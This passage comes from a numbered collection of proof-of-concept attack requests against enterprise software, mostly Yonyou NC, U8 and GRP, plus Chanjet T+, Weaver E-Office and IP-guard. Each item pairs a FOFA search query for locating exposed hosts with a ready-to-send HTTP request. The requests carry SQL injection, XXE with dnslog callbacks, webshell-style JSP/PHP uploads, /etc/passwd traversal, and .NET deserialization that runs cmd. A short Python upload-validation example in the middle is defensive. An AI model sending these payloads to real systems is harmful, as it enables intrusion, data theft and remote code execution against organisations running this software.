Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp


29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml


43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

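Items 24, 28, 35, 42, 48 and 49 above all go through the same server-side weakness: the upload handler stores whatever name the client sends (and, in item 24, whatever destination path arrives in the fname field), so a .jsp or .php file ends up under the web root. The Python below is an added example of the validation such a handler needs, written for this page; it is not code from the original post or from Yonyou. The extension allowlist, the executable-extension denylist, the destination field names and UPLOAD_ROOT are assumptions for the example, and the file names it is exercised with follow the request shapes above.

```python
import os
import re

# Assumptions for this example: what the endpoint is meant to accept and where it stores files.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "pdf", "txt"}
# Extensions that must never be stored under a web-served path, even as a middle segment.
EXECUTABLE_EXTENSIONS = {"jsp", "jspx", "jspf", "php", "phtml", "php5",
                         "asp", "aspx", "ashx", "war", "jar", "htaccess"}
# Client-controlled form fields that name a destination path; none may influence storage.
DESTINATION_FIELDS = {"fname", "filepath", "path", "dir", "savepath"}
UPLOAD_ROOT = "/srv/app/uploads"   # assumption: a directory outside the container's web root


class UploadRejected(ValueError):
    """Raised for any upload the endpoint must not store."""


def sanitize_filename(client_name: str) -> str:
    """Reduce a client-supplied name to a bare file name.

    Strips directory components written with either separator
    ("./webapps/nc_web/1.jsp", "\\webapps\\nc_web\\x.jsp"), trailing
    spaces and dots ("x.php "), and non-printable characters.
    """
    name = re.split(r"[\\/]", client_name)[-1]
    name = "".join(ch for ch in name if ch.isprintable())
    name = name.strip(" .")
    if not name or name in {".", ".."}:
        raise UploadRejected("empty or invalid file name")
    return name


def check_extension(name: str) -> str:
    """Return the stored extension after inspecting every dotted segment."""
    segments = name.lower().split(".")
    if len(segments) < 2 or not segments[-1]:
        raise UploadRejected("file name has no extension")
    exts = segments[1:]            # "a.jsp.txt" and "a.txt.jsp" are both inspected
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        raise UploadRejected("server-side script extension in " + name)
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not in allowlist: " + exts[-1])
    return exts[-1]


def resolve_destination(safe_name: str) -> str:
    """Join with UPLOAD_ROOT and prove the result stays inside it (defence in depth)."""
    root = os.path.realpath(UPLOAD_ROOT)
    dest = os.path.realpath(os.path.join(root, safe_name))
    if os.path.commonpath([root, dest]) != root or dest == root:
        raise UploadRejected("destination escapes upload root")
    return dest


def validate_upload(form_fields: dict, client_filename: str) -> str:
    """Validate one multipart upload; return the name it may be stored under."""
    present = DESTINATION_FIELDS.intersection(k.lower() for k in form_fields)
    if present:
        raise UploadRejected("client-supplied destination field: " + ", ".join(sorted(present)))
    safe_name = sanitize_filename(client_filename)
    check_extension(safe_name)
    resolve_destination(safe_name)   # path check only; nothing is written in this example
    return safe_name


def try_upload(form_fields: dict, client_filename: str):
    """Non-raising wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_upload(form_fields, client_filename)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed cases modelled on the request shapes above.
    cases = [
        ({"upload": b"..."}, "report.pdf"),
        ({"upload": b"..."}, "./webapps/nc_web/1.jsp"),
        ({"upload": b"..."}, "%s.php "),
        ({"upload": b"..."}, "photo.jsp.jpg"),
        ({"upload": b"...", "fname": "\\webapps\\nc_web\\x.jsp"}, "note.txt"),
    ]
    for fields, name in cases:
        print(repr(name), "->", try_upload(fields, name))
```

Inspecting every dotted segment rather than only the last one is what rejects both photo.jsp.jpg and photo.jpg.jsp; stripping trailing spaces and dots before the extension check is what defeats the "x.php " form in item 49, and taking only the last path component neutralises the "./webapps/nc_web/1.jsp" form in item 35. Storing outside the web root, or under a server-generated name, is the second layer once the name check passes.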

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers


56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Entsoft) Customer Resource Management System fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
